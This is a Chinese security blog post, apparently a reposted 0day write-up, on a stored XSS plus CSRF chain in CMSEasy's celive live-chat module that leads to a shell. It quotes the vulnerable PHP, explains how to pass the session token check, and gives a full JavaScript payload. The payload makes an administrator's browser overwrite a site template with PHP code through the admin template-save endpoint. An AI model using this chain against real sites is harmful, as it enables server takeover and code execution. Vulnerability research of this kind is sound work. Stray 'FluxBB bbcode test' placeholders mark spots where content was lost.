代码审计:cmseasy(易通cms)xss配合csrf getshell 0day详

  • A+
所属分类:Seay信息安全博客

显示不全请点击全屏阅读

safekey团队的zvall的一个文章

by zvall

来源:http://bbs.safekeyer.com/viewtopic.php?id=4

代码如下:

celive/index.php 代码:

$_SESSION['thislive'] = md5(time());
$_SESSION['thislivetmp'] = $_SESSION['thislive'];

if ($config['customer_info']) {
	header('Location: '.$config['url'].'/live/?action=0&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));
} else {
	header('Location: '.$config['url'].'/live/?action=1&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));
}

通过 302 header 到\celive\live\index.php这个地址,而且
$thislive=’.$_SESSION[‘thislive’] 每次访问的值都会不一样.

\celive\live\index.php 代码:

if(isset($_GET['departmentid'])){
		   $departmentid=addslashes($_GET['departmentid']);
	  }else{
		   $sql = "SELECT `departmentid` FROM `".$config['prefix']."assigns` WHERE 1";
		   @$result = $GLOBALS['db']->my_fetch_array($sql);
		   $tatolr=count($result)-1;
		   $randomr=rand(0,$tatolr);
		   $departmentid = $result[$randomr]['departmentid'];
	  }
	  $timestamp=time();
	  $name=addslashes($_POST['name']);
	  $email=addslashes($_POST['email']);
	  $phone=addslashes($_POST['phone']);
	  $name=(!empty($name)) ? $name : 'Guest';
	  $email=(!empty($email)) ? $email : '-';
	  $phone=(!empty($phone)) ? $phone : '0';
	  $ip=$_SERVER["REMOTE_ADDR"];
	  $ip=iconv('gb2312',$GLOBALS['lang']['charset'],$ip);
	  if(empty($departmentid)) $departmentid=0;
	  if($_SESSION['thislivetmp']==$_GET['thislive']){
		  $db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , '".$name."', '".$email."', '".$phone."', '".$departmentid."', '".$timestamp."', '".$ip."', '0');");
		  $sessionid = mysql_insert_id();
		  $_SESSION['departmentid'] = $departmentid;
		  $_SESSION['sessionid'] = $sessionid;
		  $_SESSION['timestamp'] = $timestamp;
		  $_SESSION['name'] = $name;
	  }

$name=addslashes($_POST[‘name’]);这里可以xss 但是他是302 head过来的 。

if($_SESSION[‘thislivetmp’]==$_GET[‘thislive’]) 要绕过这个判断,
\celive\live\index.php 只能访问一次,以保证header过去的GET变量

和session[thislivetmp] 一样 代码审计:cmseasy(易通cms)xss配合csrf getshell 0day详 and =) produces

java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时
,js触发通过ajax 请求 编辑后台模块插入一句话

FluxBB bbcode test

csrf插入到模版中的php代码

FluxBB bbcode test

FluxBB bbcode test

js代码: 

function sendrequest(){
 var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]
 if (window.ActiveXObject){
  for (var i=0; i<m.length; i++){
   try{
    return new ActiveXObject(m[i])
   }
   catch(e){}
  }
 }else if (window.XMLHttpRequest) {
 return new XMLHttpRequest()
 }else{
	return false
 }

  
}
var request=new sendrequest();
var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink('image'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get('opguestadd')%3D%3D'1'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get('site_login')%3D%3D'1'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget('site_icp')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang('links')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink('text'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+'system%2Fservers.html'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+'system%2Fsms.html'%7D%0A%0A%0A%7Bif+get('share')%3D%3D'1'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B";
request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");
request.send(data)

Tags:

cmseasy漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
代码审计:cmseasy(易通cms)xss配合csrf getshell 0day详